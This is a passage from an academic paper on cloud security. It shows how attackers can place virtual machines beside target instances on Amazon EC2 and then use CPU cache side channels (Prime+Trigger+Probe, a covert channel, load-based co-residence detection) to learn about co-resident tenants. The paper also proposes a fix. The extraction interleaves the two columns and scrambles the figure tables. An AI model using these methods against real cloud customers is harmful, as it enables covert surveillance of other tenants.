brute-force for individual targets or small target sets. Here    gle victim instance was launched. No more than 5 minutes
we discuss an alternate adversarial strategy. We assume          later 20 probe instances were launched by another account,
that an attacker can launch instances relatively soon after      and co-residence checks were performed. This process was
the launch of a target victim. The attacker then engages         repeated 10 times (with at least 5 minutes in between con-
in instance flooding: running as many instances in parallel      clusion of one iteration and beginning of the next). Each
as possible (or as many as he or she is willing to pay for)      iteration used a fresh victim; odd iterations used one ac-
in the appropriate availability zone and of the appropriate      count and even iterations used another. The right table in
type. While an individual account is limited to 20 instances,    Figure 3 displays the results. The results show a likelihood
it is trivial to gain access to more accounts. As we show,       of achieving co-residence as 40% — slightly less than half the
# victims v    # probes p   coverage
                               1             20          1/1                               Account
                 Zone 1       10             20         5/10              Trial           A      B       Total
                              20             20         7/20             Midday
                                                                                         2/5     2/5     4/10
                               1             20          0/1       (11:13 – 14:22 PST)
                 Zone 2       10             18         3/10            Afternoon
                                                                                         1/5    3/5      4/10
                              20             19         8/20       (14:12 – 17:19 PST)
                               1             20          1/1              Night
                                                                                         2/5    2/5      4/10
                 Zone 3       10             20         2/10        (23:18 – 2:11 PST)
                              20             20         8/20

Figure 3: (Left) Results of launching p probes 5 minutes after the launch of v victims. The rightmost column specifies
success coverage: the number of victims for which a probe instance was co-resident over the total number of victims.
(Right) The number of victims for which a probe achieved co-residence for three separate runs of 10 repetitions of
launching 1 victim instance and, 5 minutes later, 20 probe instances. Odd-numbered repetitions used Account A;
even-numbered repetitions used Account B.

time a recently launched victim is quickly and easily “found”     38 instances (using two accounts). In the second round, we
in the cloud. Moreover, neither the account used for the vic-     achieved a three-way co-residency: an instance from each
tims nor the portion of the day during which the experiment       of our accounts was placed on the same machine as the
was conducted significantly affected the rate of success.         RightScale server.
The effect of increased time lag. Here we show that                 rPath is another company that offers ready-to-run Inter-
the window of opportunity an attacker has for launching           net appliances powered by EC2 instances [29]. As with
instances is quite large. We performed the following exper-       RightScale, they currently offer free demonstrations, launch-
iment. Forty victim instances (across two accounts) were          ing on demand a fresh EC2 instance to host systems such
initially launched in Zone 3 and continued running through-       as Sugar CRM, described as a “customer relationship man-
out the experiment. These were placed on 36 unique ma-            agement system for your small business or enterprise” [29].
chines (8 victims were co-resident with another victim). Ev-      We were able to successfully establish a co-resident instance
ery hour a set of 20 attack instances (from a third account)      against an rPath demonstration box using 40 instances. Sub-
were launched in the same zone and co-residence checks were       sequent attempts with fresh rPath instances on a second oc-
performed. These instances were terminated immediately            casion proved less fruitful; we failed to achieve co-residence
after completion of the checks. Figure 4 contains a graph         even after several rounds of flooding. We believe that the
showing the success rate of each attack round, which stays        target in this case was placed on a full system and was there-
essentially the same over the course of the whole experiment.     fore unassailable.
(No probes were reported upon for the hours 34–43 due to          Discussion. We have seen that attackers can frequently
our scripts not gracefully handling some kinds of EC2-caused      achieve co-residence with specific targets. Why did the strat-
launch failures, but nevertheless reveals useful information:     egy fail when it did? We hypothesize that instance flooding
the obvious trends were maintained regardless of continuous       failed when targets were being assigned to machines with
probing or not.) Ultimately, co-residence with 24 of the 36       high instance density (discussed further in Appendix B) or
machines running victim instances was established. Addi-          even that became full. While we would like to use network
tionally, probes were placed on all four machines which had       probing to better understand this effect, this would require
two victim instances, thus giving three-way collisions.           port scanning IP addresses near that of targets, which would
   The right graph in Figure 4 shows the cumulative num-          perhaps violate (the spirit of) Amazon’s AUP.
ber of unique Dom0 IP addresses seen by the probes over
the course of the experiment. This shows that the growth          7.3    Patching placement vulnerabilities
in the number of machines probes were placed on levels off           The EC2 placement algorithms allow attackers to use rel-
rapidly — quantitative evidence of sequential placement lo-       atively simple strategies to achieve co-residence with victims
cality.                                                           (that are not on fully-allocated machines). As discussed ear-
On targeting commercial instances. We briefly exper-              lier, inhibiting cartography or co-residence checking (which
imented with targeted instance flooding against instances         would make exploiting placement more difficult) would seem
run by other user’s accounts. RightScale is a company that        insufficient to stop a dedicated attacker. On the other hand,
offers “platform and consulting services that enable compa-       there is a straightforward way to “patch” all placement vul-
nies to create scalable web solutions running on Amazon           nerabilities: offload choice to users. Namely, let users re-
Web Services” [28]. Presently, they provide a free demon-         quest placement of their VMs on machines that can only be
stration of their services, complete with the ability to launch   populated by VMs from their (or other trusted) accounts.
a custom EC2 instance. On two separate occasions, we setup        In exchange, the users can pay the opportunity cost of leav-
distinct accounts with RightScale and used their web inter-       ing some of these machines under-utilized. In an optimal
face to launch one of their Internet appliances (on EC2).         assignment policy (for any particular instance type), this
We then applied our attack strategy (mapping the fresh in-        additional overhead should never need to exceed the cost of
stance and then flooding). On the first occasion we sequen-       a single physical machine.
tially launched two rounds of 20 instances (using a single
account) before achieving co-residence with the RightScale
instance. On the second occasion, we launched two rounds of
Unique Dom0 assignments
                                         16               Total co-resident                                  60

                   Number of instances
                                         14                New co-resident                                   55
                                         12                                                                  50
                                         10                                                                  45
                                          8                                                                  40
                                          6                                                                  35
                                          4                                                                  30
                                          2                                                                  25
                                          0                                                                  20
                                              0      10   20    30    40      50                                  0    10    20     30    40    50

                                                  Hours since victims launched                                        Hours since victims launched
Figure 4: Results for the experiment measuring the effects of increasing time lag between victim launch and probe
launch. Probe instances were not run for the hours 34–43. (Left) “Total co-resident” corresponds to the number of
probe instances at the indicated hour offset that were co-resident with at least one of the victims. “New co-resident”
is the number of victim instances that were collided with for the first time at the indicated hour offset. (Right) The
cumulative number of unique Dom0 IP addresses assigned to attack instances for each round of flooding.

8. CROSS-VM INFORMATION LEAKAGE                                                            mented and measured simple covert channels (in which two
   The previous sections have established that an attacker                                 instances cooperate to send a message via shared resource)
can often place his or her instance on the same physical                                   using memory bus contention, obtaining a 0.006bps channel
machine as a target instance. In this section, we show the                                 between co-resident large instances, and using hard disk con-
ability of a malicious instance to utilize side channels to                                tention, obtaining a 0.0005bps channel between co-resident
learn information about co-resident instances. Namely we                                   m1.small instances. In both cases no attempts were made
show that (time-shared) caches allow an attacker to measure                                at optimizing the bandwidth of the covert channel. (The
when other instances are experiencing computational load.                                  hard disk contention channel was used in Section 6 for estab-
Leaking such information might seem innocuous, but in fact                                 lishing co-residence of instances.) Covert channels provide
it can already be quite useful to clever attackers. We intro-                              evidence that exploitable side channels may exist.
duce several novel applications of this side channel: robust                                  Though this is not our focus, we further observe that the
co-residence detection (agnostic to network configuration),                                same resources can also be used to mount cross-VM per-
surreptitious detection of the rate of web traffic a co-resident                           formance degradation and denial-of-service attacks, analo-
site receives, and even timing keystrokes by an honest user                                gously to those demonstrated for non-virtualized multipro-
(via SSH) of a co-resident instance. We have experimentally                                cessing [12, 13, 21].
investigated the first two on running EC2 instances. For the
keystroke timing attack, we performed experiments on an                                    8.1                    Measuring cache usage
EC2-like virtualized environment.                                                            An attacking instance can measure the utilization of CPU
                                                                                           caches on its physical machine. These measurements can
On stealing cryptographic keys. There has been a long
                                                                                           be used to estimate the current load of the machine; a high
line of work (e.g., [10, 22, 26]) on extracting cryptographic
                                                                                           load indicates activity on co-resident instances. Here we
secrets via cache-based side channels. Such attacks, in the
                                                                                           describe how to measure cache utilization in EC2 instances
context of third-party compute clouds, would be incredibly
                                                                                           by adapting the Prime+Probe technique [22, 32]. We also
damaging — and since the same hardware channels exist, are
                                                                                           demonstrate exploiting such cache measurements as a covert
fundamentally just as feasible. In practice, cryptographic
                                                                                           channel.
cross-VM attacks turn out to be somewhat more difficult to
realize due to factors such as core migration, coarser schedul-                            Load measurement. We utilize the Prime+Probe tech-
ing algorithms, double indirection of memory addresses, and                                nique [22, 32] to measure cache activity, and extend it to
(in the case of EC2) unknown load from other instances                                     the following Prime+Trigger+Probe measurement to sup-
and a fortuitous choice of CPU configuration (e.g. no hy-                                  port the setting of time-shared virtual machines (as present
perthreading). The side channel attacks we report on in                                    on Amazon EC2). The probing instance first allocates a con-
the rest of this section are more coarse-grained than those                                tiguous buffer B of b bytes. Here b should be large enough
required to extract cryptographic keys. While this means                                   that a significant portion of the cache is filled by B. Let s
the attacks extract less bits of information, it also means                                be the cache line size, in bytes. Then the probing instance
they are more robust and potentially simpler to implement                                  performs the following steps to generate each load sample:
in noisy environments such as EC2.                                                         (1) Prime: Read B at s-byte offsets in order to ensure it is
Other channels; denial of service. Not just the data                                          cached.
cache but any physical machine resources multiplexed be-                                   (2) Trigger: Busy-loop until the CPU’s cycle counter jumps
tween the attacker and target forms a potentially useful                                      by a large value. (This means our VM was preempted by
channel: network access, CPU branch predictors and in-                                        the Xen scheduler, hopefully in favor of the sender VM.)
struction cache [1, 2, 3, 12], DRAM memory bus [21], CPU                                   (3) Probe: Measure the time it takes to again read B at
pipelines (e.g., floating-point units) [4], scheduling of CPU                                 s-byte offsets.
cores and timeslices, disk access [16], etc. We have imple-                                When reading the b/s memory locations in B, we use a
                                                                                           pseudorandom order, and the pointer-chasing technique de-
scribed in [32], to prevent the CPU’s hardware prefetcher         (2) Sleep briefly (to build up credit with Xen’s scheduler).
from hiding the access latencies. The time of the final step’s    (3) Prime: Read all of B to make sure it’s fully cached.
read is the load sample, measured in number of CPU cycles.        (4) Trigger: Busy-loop until the CPU’s cycle counter jumps
These load samples will be strongly correlated with use of            by a large value. (This means our VM was preempted by
the cache during the trigger step, since that usage will evict        the Xen scheduler, hopefully in favor of the sender VM.)
some portion of the buffer B and thereby drive up the read        (5) Probe: Measure the time it takes to read all even ad-
time during the probe phase. In the next few sections we              dresses in B, likewise for the odd addresses. Decide “0”
describe several applications of this load measurement side           iff the difference is positive.
channel. First we describe how to modify it to form a robust
                                                                  On EC2 we need to deal with the noise induced by the fact
covert channel.
                                                                  that each VM’s virtual CPU is occasionally migrated be-
Cache-based covert channel. Cache load measurements               tween the (m1.small) machine’s four cores. This also leads
create very effective covert channels between cooperating         to sometimes capturing noise generated by VMs other than
processes running in different VMs. In practice, this is not      the target (sender). Due to the noise-cancelling property of
a major threat for current deployments since in most cases        differential encoding, we can use a straightforward strategy:
the cooperating processes can simply talk to each other over      the receiver takes the average of multiple samples for making
a network. However, covert channels become significant            his decision, and also reverts to the prime stage whenever it
when communication is (supposedly) forbidden by informa-          detects that Xen scheduled it to a different core during the
tion flow control (IFC) mechanisms such as sandboxing and         trigger or probe stages. This simple solution already yields
IFC kernels [34, 18, 19]. The latter are a promising emerg-       a bandwidth of approximately 0.2bps, running on EC2.
ing approach to improving security (e.g., web-server func-
tionality [18]), and our results highlight a caveat to their      8.2    Load-based co-residence detection
effectiveness.                                                       Here we positively answer the following question: can one
   In the simplest cache covert-channel attack [15], the sender   test co-residence without relying on the network-based tech-
idles to transmit “0” and frantically accesses memory to          niques of Section 6? We show this is indeed possible, given
transmit “1”. The receiver accesses a memory block of his         some knowledge of computational load variation on the tar-
own and observes the access latencies. High latencies are in-     get instance. This condition holds when an adversary can
dicative that the sender is evicting the receiver’s data from     actively cause load variation due to a publicly-accessible ser-
the caches, i.e., that “1” is transmitted. This attack is ap-     vice running on the target. It might also hold in cases where
plicable across VMs, though it tends to be unreliable (and        an adversary has a priori information about load variation
thus has very low bandwidth) in a noisy setting.                  on the target and this load variation is (relatively) unique
   We have created a much more reliable and efficient cross-      to the target.
VM covert channel by using finer-grained measurements.               Consider target instances for which we can induce compu-
We adapted the Prime+Trigger+Probe cache measurement              tational load — for example, an instance running a (public)
technique as follows. Recall that in a set-associative cache,     web server. In this case, an attacker instance can check for
the pool of cache lines is partitioned into associativity sets,   co-residence with a target instance by observing differences
such that each memory address is mapped into a specific           in load samples taken when externally inducing load on the
associativity set determined by certain bits in the address       target versus when not. We experimentally verified the effi-
(for brevity, we ignore here details of virtual versus physi-     cacy of this approach on EC2 m1.small instances. The target
cal addresses). Our attack partitions the cache sets into two     instance ran Fedora Core 4 with Apache 2.0. A single 1 024-
classes, “odd sets” and “even sets”, and manipulates the load     byte text-only HTML page was made publicly accessible.
across each class. For resilience against noise, we use differ-   Then the co-residence check worked as follows. First, the
ential coding where the signal is carried in the difference       attacker VM took 100 load samples. (We set b = 768 ∗ 1024
between the load on the two classes. Noise will typically         and s = 128. Taking 100 load samples took about 12 sec-
be balanced between the two classes, and thus preserve the        onds.) We then paused for ten seconds. Then we took 100
signal. (This argument can be made rigorous by using a            further load samples while simultaneously making numer-
random-number generator for the choice of classes, but the        ous HTTP get requests from a third system to the target
following simpler protocol works well in practice.)               via jmeter 2.3.4 (a utility for load testing HTTP servers).
   The protocol has three parameters: a which is larger           We set jmeter to simulate 100 users (100 separate threads).
than the attacked cache level (e.g., a = 221 to attack the        Each user made HTTP get requests as fast as possible.
EC2’s Opteron L2 cache), b which is slightly smaller than            The results of three trials with three pairs of m1.small
the attacked cache level (here, b = 219 ), and d which is         instances are plotted in Figure 5. In the first trial we used
the cache line size times a power of 2. Define even ad-           two instances known to be co-resident (via network-based
dresses (resp. odd addresses) as those that are equal to          co-residence checks). One can see the difference between
0 mod 2d (resp. d mod 2d). Define the class of even cache         the load samples when performing HTTP gets and when
sets (resp. odd cache sets) as those cache sets to which even     not. In the second trial we used a fresh pair of instances
(resp. odd) addresses are mapped.                                 co-resident on a different machine, and again one can easily
   The sender allocates a contiguous buffer A of a bytes. To      see the effect of the HTTP gets on the load samples. In the
transmit “0” (resp. 1) he reads the even (resp. odd) addresses    third trial, we used two instances that were not co-resident.
in A. This ensures that the one class of cache sets is fully      Here the load sample timings are, as expected, very similar.
evicted from the cache, while the other is mostly untouched.      We emphasize that these measurements were performed on
   The receiver defines the difference by the following mea-      live EC2 instances, without any knowledge of what other
surement procedure:                                               instances may (or may not) have been running on the same
(1) Allocate a contiguous buffer B of b bytes                     machines. Indeed, the several spikes present in Trial 2’s
You can also read